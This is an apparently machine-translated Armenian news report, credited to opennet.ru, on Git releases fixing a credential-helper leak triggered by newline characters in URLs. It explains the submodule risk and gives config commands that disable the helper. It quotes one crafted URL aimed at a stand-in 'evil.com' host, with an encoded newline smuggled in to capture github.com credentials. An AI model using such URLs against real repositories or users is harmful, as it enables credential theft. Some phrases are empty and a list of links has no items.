բաշխված աղբյուրի կառավարման համակարգի ուղղիչ թողարկումները Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 և 2.17.4, որը վերացրել է () կարգավորիչում»«, ինչը հանգեցնում է նրան, որ հավատարմագրերը ուղարկվում են սխալ հոսթին, երբ git հաճախորդը մուտք է գործում պահոց՝ օգտագործելով նոր տող նիշ պարունակող հատուկ ձևաչափված URL: Խոցելիությունը կարող է օգտագործվել՝ կազմակերպելու, որպեսզի այլ հոսթից հավատարմագրերն ուղարկվեն հարձակվողի կողմից վերահսկվող սերվեր:
«https://evil.com?%0ahost=github.com/»-ի նման URL նշելիս, հավատարմագրերի մշակողը, երբ միանում է հյուրընկալող evil.com-ին, կփոխանցի github.com-ի համար սահմանված նույնականացման պարամետրերը: Խնդիրն առաջանում է այնպիսի գործողություններ կատարելիս, ինչպիսին է «git clone»-ը, ներառյալ ենթամոդուլների URL-ների մշակումը (օրինակ, «git submodule update»-ը ավտոմատ կերպով կմշակի .gitmodules ֆայլում նշված URL-ները պահեստից): Խոցելիությունն առավել վտանգավոր է այն իրավիճակներում, երբ ծրագրավորողը կլոնավորում է պահոցը՝ չտեսնելով URL-ը, օրինակ՝ ենթամոդուլների հետ աշխատելիս կամ ավտոմատ գործողություններ կատարող համակարգերում, օրինակ՝ փաթեթի կառուցման սկրիպտներում:
Նոր տարբերակներում խոցելիությունները արգելափակելու համար նոր տողի նիշի փոխանցում հավատարմագրերի փոխանակման արձանագրության միջոցով փոխանցված ցանկացած արժեքով: Բաշխումների համար կարող եք հետևել փաթեթների թարմացումների թողարկմանը էջերում , , , , , , .
Որպես խնդրի արգելափակման լուծում Մի օգտագործեք credential.helper-ը հանրային պահեստներ մուտք գործելիս և մի օգտագործեք «git clone» «--recurse-submodules» ռեժիմում՝ չստուգված պահոցներով: Ամբողջովին անջատելու համար credential.helper handler-ը, որն անում է և գաղտնաբառերի առբերում , պաշտպանված կամ գաղտնաբառերով ֆայլ, կարող եք օգտագործել հրամանները.
git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper
Source: opennet.ru